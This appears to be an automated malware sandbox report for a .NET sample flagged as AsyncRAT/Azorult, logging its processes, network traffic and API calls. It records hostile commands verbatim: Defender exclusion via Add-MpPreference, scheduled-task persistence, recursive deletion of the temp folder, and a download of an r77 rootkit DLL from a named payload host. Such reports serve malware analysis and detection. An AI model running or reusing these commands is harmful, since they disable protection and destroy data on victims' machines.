Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 19, 2021, 9:43 a.m.	Oct. 19, 2021, 9:56 a.m.

Size	861.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`1b465c6989637df1d5c511919c43e457`
SHA256	`0b196e6b27ed15410bd946b1ccfd1de6b7af64a540cd0226b8eb9bd742d1b095`
CRC32	`CDD32089`
ssdeep	`24576:nc6zD+4oOZ34MRxbnCiZXsqK+eHTesb/hyDVeb:5D+NOZoax7CSX/g`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware IsPE32 - (no description) Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

ski.exe "C:\Users\test22\AppData\Local\Temp\ski.exe"
2236
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ski.exe"
  456
- schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmpF95D.tmp"
  2240
winrara.exe "C:\Users\test22\AppData\Roaming\SubDir\winrara.exe"
1080
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SubDir\winrara.exe"
  2928
- schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmp220E.tmp"
  2480
- winrara.exe "C:\Users\test22\AppData\Roaming\SubDir\winrara.exe"
  2504
powershell.exe "powershell" Get-MpPreference -verbose
1648
cmd.exe "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
2220
- cmd.exe C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\test22\AppData\Local\Temp\*
  2748
cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\IItpH4jzjf3i.bat" "
2268
- chcp.com chcp 65001
  2148
- PING.EXE ping -n 10 localhost
  2284
- ski.exe "C:\Users\test22\AppData\Local\Temp\ski.exe"
  2156

Name	Response	Post-Analysis Lookup
payloads-poison.000webhostapp.com	A 145.14.145.34 CNAME us-east-1.route-1.000webhost.awex.io	145.14.145.39
ip-api.com	A 208.95.112.1	208.95.112.1

IP Address	Status	Action
145.14.145.34	Active	Moloch
164.124.101.2	Active	Moloch
208.95.112.1	Active	Moloch
91.134.207.16	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49170 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
UDP 192.168.56.102:64034 -> 164.124.101.2:53	2026657	ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)	Not Suspicious Traffic
TCP 192.168.56.102:49174 -> 145.14.145.34:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 145.14.145.34:443 -> 192.168.56.102:49174	2026658	ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)	Not Suspicious Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49174 145.14.145.34:443	C=US, O=DigiCert Inc, CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1	CN=*.000webhostapp.com	f3:1b:b7:47:29:59:39:c1:91:7d:b4:61:da:4d:ec:0d:8c:e1:e7:c1

Queries for the computername (20 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 19, 2021, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 19, 2021, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 19, 2021, 9:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 19, 2021, 9:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2021, 9:56 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (11 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 19, 2021, 9:43 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:43 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:54 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:55 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:55 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:55 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:56 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:56 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:56 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:56 a.m.			0	0
IsDebuggerPresent Oct. 19, 2021, 9:56 a.m.			0	0

Command line console output was observed (50 out of 148 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\ski. console_handle: 0x00000053	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: exe console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Oct. 19, 2021, 9:54 a.m.	buffer: The system cannot find the file specified. console_handle: 0x0000000b	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\AdobeARM.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\AdobeARM_NotLocked.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\AdobeSFX.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\ArmUI.ini console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00001.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00002.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00003.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\bchA472.tmp console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\bchA86E.tmp console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\bchC5ED.tmp console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\bchC68D.tmp console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\chrome_installer.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\CVRE545.tmp.cvr console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_dotnet4.5_decompression_log.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_dotNetFx45LP_Full_x86_x64ko_decompression_log.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_SetupUtility.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_TMPA86C.tmp_decompression_log.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_vcredistMSI7BFC.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_vcredistMSI7C06.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_vcredistUI7BFC.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_vcredistUI7C06.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_001_vcRuntimeAdditional_x64.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_wcf_CA_smci_20200715_051339_493.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\dd_wcf_CA_smci_20200715_051341_086.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\DMI23E3.tmp console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\DMI4556.tmp console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\DMI9EEF.tmp console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\FXSAPIDebugLogFile.txt console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: The process cannot access the file because it is being used by another process. console_handle: 0x0000000b	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\g2bInfo.dll console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\G2BWinJNI.dll console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000002.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000003.log console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2021, 9:55 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000004.log console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 138 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006079c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006079c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006079c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006078c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006078c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006078c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006078c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006078c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006078c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006072c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006072c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006072c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006074c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00601c68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00601828 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00601828 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2021, 9:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00601828 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 19, 2021, 9:43 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://payloads-poison.000webhostapp.com/r77-x64.dll

Performs some HTTP requests (2 events)

request	GET http://ip-api.com/json/
request	GET https://payloads-poison.000webhostapp.com/r77-x64.dll

Allocates read-write-execute memory (usually to unpack itself) (50 out of 637 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x731a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x731a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ca0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00dc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00312000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0032c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00621000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00624000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0031a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
